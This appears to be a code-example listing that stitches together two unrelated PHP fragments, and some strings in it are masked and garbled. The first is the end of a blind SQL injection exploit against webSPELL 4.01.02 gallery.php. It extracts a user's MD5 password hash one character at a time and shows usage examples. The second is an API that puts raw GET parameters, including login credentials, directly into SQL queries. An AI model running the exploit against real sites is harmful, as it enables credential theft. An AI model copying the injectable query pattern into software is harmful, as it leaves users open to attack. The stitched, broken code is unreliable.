Beispiel #1
0
    echo "exploiting...\n";
    echo "md5-hash: ";
    for ($i = 1; $i <= 32; $i++) {
        $found = false;
        $h = 48;
        while (!$found and $h <= 57) {
            if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
                $found = true;
                echo chr($h);
            }
            $h++;
        }
        if (!$found) {
            $h = 97;
            while (!$found and $h <= 122) {
                if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
                    $found = true;
                    echo chr($h);
                }
                $h++;
            }
        }
    }
} else {
    echo "\n\n";
    echo "|=======webSPELL v4.01.02 gallery.php SQL Injection========\n";
    echo "|\n";
    echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path] [prefix] [valid GalleryID] [valid PicID] [valid UserID] ([Proxy-IP:Port])\n|\n";
    echo "|Example (with Proxy): php " . $_SERVER['argv'][0] . " localhost /webspell/ webs_ 1 1 1 192.168.1.1:80\n|\n";
    echo "|Example (without Proxy): php " . $_SERVER['argv'][0] . " localhost /webspell/ webs_ 1 1 1\n|\n";
    echo "|Notes: This exploit works regardless of the PHP security settings (magic_quotes, register_globals)\n";
     if (istrue($conn, "*", "as_Vote", "user = "******"user"] . " AND target_id = " . $_GET["ispostliked"] . " AND target = 'as_Post'", "target_id", $_GET["ispostliked"])) {
         echo "true";
     } else {
         echo "false";
     }
 } else {
     if (isset($_GET["iscommentliked"]) && isset($_GET["user"])) {
         //-------------------is comment liked
         if (istrue($conn, "*", "as_Vote", "user = "******"user"] . " AND target_id = " . $_GET["iscommentliked"] . " AND target = 'as_Comment'", "target_id", $_GET["iscommentliked"])) {
             echo "true";
         } else {
             echo "false";
         }
     } else {
         if (isset($_GET["username"]) && isset($_GET["password"])) {
             if (istrue($conn, "password", "as_User", "username = '******'username'] . "'", "password", $_GET["password"])) {
                 echo select($conn, "id", "as_User", "username = '******'username'] . "'")->fetch_assoc()['id'];
             } else {
                 echo "false";
             }
         } else {
             if (isset($_GET['comments'])) {
                 $result = select($conn, "as_Comment.id, as_Comment.`text`, as_User.`username`", "as_Comment, as_User", "as_User.`id` = as_Comment.`user_id` AND as_Comment.`Project_id` = " . $_GET['comments']);
                 $arrContainer = array();
                 while ($row = $result->fetch_assoc()) {
                     $row['votes'] = $conn->query("SELECT COUNT(*) AS 'votes' FROM as_Vote WHERE target = 'as_Comment' AND target_id = " . $row['id'])->fetch_assoc()['votes'];
                     $arrContainer[] = $row;
                 }
                 echo json_encode($arrContainer);
             } else {
                 if (isset($_GET["votepost"]) && isset($_GET["user"])) {